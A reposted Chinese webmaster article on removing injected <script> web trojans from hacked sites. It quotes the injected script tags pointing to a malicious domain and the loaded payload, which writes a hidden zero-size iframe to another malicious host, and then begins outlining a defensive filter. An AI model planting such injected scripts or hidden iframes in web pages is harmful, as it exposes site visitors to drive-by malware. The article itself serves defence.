解决全部网页木马的方法
发布时间:2021-12-26 16:33:51 所属栏目:安全 来源:互联网
导读:还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。 前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这
|
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。 前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了: 注意,以下地址含有木马,请不要轻易访问: <script src=http://vccd.cn></script> <script src=http://vccd.cn></script> <script src=http://vccd.cn></script> <script src=http://vccd.cn></script> <script src=http://vccd.cn></script> <script src=http://vccd.cn></script> <script src=http://vccd.cn></script> <script src=http://vccd.cn></script> 汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个http://vccd.cn(或直接使用迅雷下载),额~ 现形了: document.write("<div style=’display:none’>") document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>") document.write("</div>") … var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL//XXXXXLD"; Kfqq = Qqs; (…略)(下面还有N个统计的JS代码) 针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,<script>木马的特点是什么: <script src=http://vccd.cn></script> 对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。 (编辑:南通站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐